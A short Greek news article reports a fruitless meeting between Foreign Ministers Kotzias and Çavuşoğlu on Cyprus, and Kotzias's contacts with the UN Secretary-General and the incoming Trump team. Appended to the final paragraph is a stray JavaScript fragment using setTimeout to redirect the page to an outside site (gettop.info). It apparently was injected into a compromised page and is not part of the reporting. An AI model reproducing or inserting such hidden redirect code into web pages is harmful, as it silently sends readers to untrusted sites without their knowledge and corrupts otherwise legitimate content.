Άκαρπη η συνάντηση Κοτζιά-Τσαβούσογλου

0
7

 

Νωρίς το πρωί ο υπουργός Εξωτερικών της Ελλάδας Νίκος Κοτζιάς είχε συνάντηση με τον Τούρκο ομόλογό του Μεβλούτ Τσαβούσογλου για το Κυπριακό, αλλά η συνάντησή τους κατέληξε χωρίς ουσιαστικό αποτέλεσμα.

Όπως δήλωσε ο κ. Κοτζιάς, δεν κατέστη δυνατόν οι δύο υπουργοί να φτάσουν «έστω και σε μια πλησιέστερη σκέψη πάνω σε αυτά τα θέματα».

Ο κ. Κοτζιάς προχώρησε σε συναντήσεις τόσο με ελληνοαμερικανικές και κυπροαμερικανικές οργανώσεις όσο και με το εβραϊκό λόμπι, ενώ είχε επαφές και με τον νέο γενικό γραμματέα του ΟΗΕ Αντόνιο Γκουτέρες.

Ο Έλληνας ΥΠΕΞ επανέλαβε την πάγια ελληνική θέση ότι πρέπει να καταργηθεί το σύστημα των εγγυήσεων, να μην υπάρχουν παρεμβατικά δικαιώματα για οποιαδήποτε χώρα πάνω στην Κύπρο και να απομακρυνθούν τα ξένα στρατεύματα, πριν απ’ όλα τα τουρκικά κατοχικά.

Οι επαφές του κ. Κοτζιά επεκτάθηκαν και στο επιτελείο του εκλεγμένου προέδρου των ΗΠΑ Ντόναλντ Τραμπ, καθώς υπήρξε συνάντηση με τον σύμβουλο Εθνικής Ασφαλείας Μάικ Φλιν, καθώς και με τον νέο επιτελάρχη του Λευκού Οίκου και απερχόμενο πρόεδρο του Ρεπουμπλικανικού Κόμματος Ρινς Πρίμπους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here